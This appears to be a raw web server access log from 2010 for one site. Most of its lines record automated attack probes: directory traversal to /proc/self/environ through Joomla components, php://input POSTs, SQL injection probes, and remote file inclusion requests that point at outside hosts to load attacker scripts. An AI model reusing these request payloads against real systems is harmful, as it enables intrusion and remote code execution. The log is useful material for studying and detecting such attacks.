80.245.41.107 - - [02/Sep/2010:10:13:19 -0700] "GET /logs/access_100610.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:13:20 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:13:21 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:13:34 -0700] "GET /logs/access_100822.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:13:35 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:13:36 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:40 -0700] "GET /logs/access_100201.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:13:43 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:13:43 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:49 -0700] "GET /logs/access_100201.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:50 -0700] "GET /logs/access_100201.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:56 -0700] "GET /logs/access_100201.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:14:10 -0700] "GET /logs/access_091025.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:14:12 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:14:34 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:14:44 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:14:52 -0700] "GET /logs/access_090912.log%20%20/////appserv/main.php?appserv_root=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:14:52 -0700] "GET /logs/////appserv/main.php?appserv_root=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:14:54 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:15:01 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:15:12 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:15:24 -0700] "GET /logs/access_100610.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:15:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:15:26 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:10:15:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:10:15:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:10:15:54 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
198.106.183.7 - - [02/Sep/2010:10:15:57 -0700] "POST /logs/access_100410.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:16:08 -0700] "GET /megumi/ HTTP/1.0" 200 1595 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:11 -0700] "GET /logs/access_100610.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:14 -0700] "GET /logs/access_100610.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:14 -0700] "GET /logs/access_100610.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:15 -0700] "POST /logs/access_100610.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:18 -0700] "GET /logs/access_100610.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:18 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68611 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:18 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:19 -0700] "GET /logs/access_100610.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:19 -0700] "GET /logs/access_100610.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:19 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:19 -0700] "GET /logs/access_100610.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:19 -0700] "POST /logs/access_100610.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:19 -0700] "GET /logs/access_100610.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:19 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68611 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:20 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:20 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:21 -0700] "POST /?option=com_agora&task=php://input HTTP/1.1" 200 68390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:22 -0700] "GET /?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68549 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:23 -0700] "POST /?option=com_agora&task=php://input HTTP/1.1" 200 68390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:23 -0700] "GET /?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68549 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:24 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:24 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:24 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:25 -0700] "GET /logs//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:25 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:26 -0700] "POST /logs//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:26 -0700] "GET /logs//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:16:26 -0700] "GET /logs//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:27 -0700] "POST /logs//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:16:30 -0700] "GET /logs//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
79.174.72.86 - - [02/Sep/2010:10:16:47 -0700] "GET /logs/access_080626.log//index.php?sbjoke_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
79.174.72.86 - - [02/Sep/2010:10:16:48 -0700] "GET /index.php?sbjoke_id=' HTTP/1.1" 200 68368 "-" "libwww-perl/5.810" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:16:49 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
79.174.72.86 - - [02/Sep/2010:10:16:49 -0700] "GET /logs//index.php?sbjoke_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
207.46.13.134 - - [02/Sep/2010:10:16:54 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:17:12 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:17:21 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:17:31 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:10:17:56 -0700] "POST /logs/access_100526.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:18:16 -0700] "GET /logs/access_100619.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:18:16 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:18:19 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:18:26 -0700] "GET /logs/access_080626.log//index.php?sbjoke_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:18:27 -0700] "GET /index.php?sbjoke_id=' HTTP/1.1" 200 68368 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:18:28 -0700] "GET /logs//index.php?sbjoke_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:18:36 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:18:52 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:19:16 -0700] "GET /logs/access_100616.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:19:17 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:19:18 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:19:18 -0700] "GET /logs/access_100616.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:19:20 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:19:21 -0700] "GET /logs/access_100601.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:19:21 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:19:21 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:19:21 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:19:25 -0700] "GET /logs/access_100616.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:19:26 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:19:27 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:20:09 -0700] "GET /appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:20:18 -0700] "GET /logs/access_100616.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:20:22 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:20:23 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:20:24 -0700] "GET /logs/access_100619.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:20:24 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:20:24 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:20:43 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:20:59 -0700] "GET /logs//appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:20:59 -0700] "GET /logs/access_090917.log%20%20//appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:21:05 -0700] "GET /logs/access_100616.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:21:06 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:21:07 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:21:21 -0700] "GET /appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:21:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:21:36 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68611 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:21:37 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:21:37 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:21:38 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68611 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:21:39 -0700] "POST /?option=com_agora&task=php://input HTTP/1.1" 200 68390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:21:41 -0700] "GET /logs/access_100601.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:21:42 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:21:42 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:21:42 -0700] "GET /?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68549 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:21:47 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:21:48 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
